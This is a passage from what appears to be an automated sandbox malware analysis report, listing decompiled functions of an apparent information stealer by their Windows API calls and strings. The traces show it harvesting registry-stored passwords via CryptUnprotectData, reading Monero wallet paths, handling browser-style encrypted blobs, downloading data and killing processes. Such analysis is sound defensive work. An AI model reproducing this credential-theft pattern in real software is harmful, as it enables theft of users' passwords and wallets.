                            • Part of subcall function 005177D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00517805
                            • Part of subcall function 005177D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0051784A
                            • Part of subcall function 005177D0: StrStrA.SHLWAPI(?,Password), ref: 005178B8
                            • Part of subcall function 005177D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005178EC
                            • Part of subcall function 005177D0: HeapFree.KERNEL32(00000000), ref: 005178F3
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 00517A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00517ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00517ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00517AF0
                          • wsprintfA.USER32 ref: 00517B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00517B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00517B47
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 00517B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: e465799f477f44a0c1b56dbeb56a856cc09fac9156413a7a2d95dc0e3eb6a52d
                          • Instruction ID: 0ab4aa37a2eccf594bd465f9c7fcae9efdb328c57c1e61336ef7a7dd6ab7b77a
                          • Opcode Fuzzy Hash: e465799f477f44a0c1b56dbeb56a856cc09fac9156413a7a2d95dc0e3eb6a52d
                          • Instruction Fuzzy Hash: E731D5BAA0421CAFDB10DB68DC449EFBF7AFF89300F14851AE605A3210DB74A981DB55
                          Function 005281B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0052820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528243
                          • lstrlen.KERNEL32(00000000), ref: 00528260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528297
                          • lstrlen.KERNEL32(00000000), ref: 005282B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005282EB
                          • lstrlen.KERNEL32(00000000), ref: 00528308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528337
                          • lstrlen.KERNEL32(00000000), ref: 00528351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528380
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: a96a46412f896e6df09524f7a4af571cafffe72cbfa55bfd933c1a3c521f2b49
                          • Instruction ID: 29c86f992cc6f2e8749cb36ce1bc02a7e0356c54eae92067803fa5d842d4013c
                          • Opcode Fuzzy Hash: a96a46412f896e6df09524f7a4af571cafffe72cbfa55bfd933c1a3c521f2b49
                          • Instruction Fuzzy Hash: 815172755016129BE714DFB8EC98ABABBA4FF51700F114914AD16DB284EB34EDA0CBD0
                          Function 005177D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00517805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0051784A
                          • StrStrA.SHLWAPI(?,Password), ref: 005178B8
                            • Part of subcall function 00517750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0051775E
                            • Part of subcall function 00517750: RtlAllocateHeap.NTDLL(00000000), ref: 00517765
                            • Part of subcall function 00517750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0051778D
                            • Part of subcall function 00517750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005177AD
                            • Part of subcall function 00517750: LocalFree.KERNEL32(?), ref: 005177B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005178EC
                          • HeapFree.KERNEL32(00000000), ref: 005178F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00517A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: 2079e0753c2b9d7a3620fc089bb1665b4c43d32d7bc80c44b4b72c4d45860fda
                          • Instruction ID: a1bf9dda886908a22af27e00b384c1dd4bda5b5341d07ea7c96accf3d04b7313
                          • Opcode Fuzzy Hash: 2079e0753c2b9d7a3620fc089bb1665b4c43d32d7bc80c44b4b72c4d45860fda
                          • Instruction Fuzzy Hash: B07162B5D0021DABDB10DF98CC80AEEBBB9FF49300F10456AE509A7240EB355A89CF94
                          Function 00511120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00511135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0051113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00511159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00511173
                          • RegCloseKey.ADVAPI32(?), ref: 0051117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 0051114F
                          • wallet_path, xrefs: 0051116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 87d93f821868ba62b7963f2aa92ab31313115271fd744424bfe2b2db02fcbc2b
                          • Instruction ID: 43f6c4994fe6b7932251fc9394019ce7a0268ed6db1e2311282373517122b70b
                          • Opcode Fuzzy Hash: 87d93f821868ba62b7963f2aa92ab31313115271fd744424bfe2b2db02fcbc2b
                          • Instruction Fuzzy Hash: 35F06D79680209BBE7109BA09C4DFEB7B6CEB05715F004055FF05E2290E7B45A4887A4
                          Function 00519DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00519E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00519E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00519EA7
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • lstrcpy.KERNEL32(00000000,00544C48), ref: 00519FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: 470a2ba792cb190f82d1f9b0f5453c8ba4347f299541de89c808477db9de4f28
                          • Instruction ID: 38f771d75297f846ac1f5d63ff5f5f65f006c4e3baf68e32ace9735d2ca99468
                          • Opcode Fuzzy Hash: 470a2ba792cb190f82d1f9b0f5453c8ba4347f299541de89c808477db9de4f28
                          • Instruction Fuzzy Hash: 3851A171A5020AABEB11EF68DC89BDE7FB4BF40314F154424F909EB241DB70DD958B90
                          Function 00515640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0051565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00515661
                          • InternetOpenA.WININET(0053CFEC,00000000,00000000,00000000,00000000), ref: 00515677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00515692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 005156BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 005156E1
                          • InternetCloseHandle.WININET(?), ref: 005156FA
                          • InternetCloseHandle.WININET(00000000), ref: 00515701
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 08b9c445addb7b3b9fe0a3a02bfbe295451e523281cc9aa5f8e6fdee9bd065aa
                          • Instruction ID: 440d2da3ab64397455f9a16675ba36f8a8440ac5e893f93dda5b3ca2c78cd264
                          • Opcode Fuzzy Hash: 08b9c445addb7b3b9fe0a3a02bfbe295451e523281cc9aa5f8e6fdee9bd065aa
                          • Instruction Fuzzy Hash: CC419274A00205DFEB14CF64DC89FAABBB4FF85340F14C06AEA089B291E7759D81CB94
                          Function 00534740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00534759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00534769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0053477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 005347AB
                          • CloseHandle.KERNEL32(00000000), ref: 005347B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 005347C0
                          • CloseHandle.KERNEL32(00000000), ref: 005347CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: f335adf0e4f226552ce950e24248a02d2404db0445a86cd411a54ad355032c0f
                          • Instruction ID: 7571a5ee42de9ab0974592365a5d0a33ac0b9cd2d698df432165c6f9ed204d82
                          • Opcode Fuzzy Hash: f335adf0e4f226552ce950e24248a02d2404db0445a86cd411a54ad355032c0f
                          • Instruction Fuzzy Hash: EE01F535601218ABE7305B209C89FEE7BBCFB0AB41F004282FA05D1091EF78AD858E65
                          Function 005283E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00528435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052846C
                          • lstrlen.KERNEL32(00000000), ref: 005284B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005284E9
                          • lstrlen.KERNEL32(00000000), ref: 005284FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052852E
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 0052853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 233de0a2a16dbc0cd25690327ffb8028ccc28afec760b227bf151a8fecac919c
                          • Instruction ID: 17456d0978199dd85da742bf4dcd9be79f6121e7874595d81ceb02f0a9f9a72c
                          • Opcode Fuzzy Hash: 233de0a2a16dbc0cd25690327ffb8028ccc28afec760b227bf151a8fecac919c
                          • Instruction Fuzzy Hash: BC51B5756002269FDB20DFA8E884AABBBF5FF85700F148459EC45DB285EF34D981CB90
                          Function 00532910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00532925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053292C
                          • RegOpenKeyExA.ADVAPI32(80000002,0119B738,00000000,00020119,005328A9), ref: 0053294B
                          • RegQueryValueExA.ADVAPI32(005328A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00532965
                          • RegCloseKey.ADVAPI32(005328A9), ref: 0053296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 900f603dd3441142f80d59f2a0aad44b6ce2cec54495ecf2cdd0d8a0b4f4bfb9
                          • Instruction ID: 414c3102449b75cd71df5016b2e5487ec99f5f395fab5ddc99128ddf240785de
                          • Opcode Fuzzy Hash: 900f603dd3441142f80d59f2a0aad44b6ce2cec54495ecf2cdd0d8a0b4f4bfb9
                          • Instruction Fuzzy Hash: 3E01FC79600319ABD320CBA09C48FEB7BACEB0A711F108089FE8597240EB34590887A0
                          Function 00532880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00532895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053289C
                            • Part of subcall function 00532910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00532925
                            • Part of subcall function 00532910: RtlAllocateHeap.NTDLL(00000000), ref: 0053292C
                            • Part of subcall function 00532910: RegOpenKeyExA.ADVAPI32(80000002,0119B738,00000000,00020119,005328A9), ref: 0053294B
                            • Part of subcall function 00532910: RegQueryValueExA.ADVAPI32(005328A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00532965
                            • Part of subcall function 00532910: RegCloseKey.ADVAPI32(005328A9), ref: 0053296F
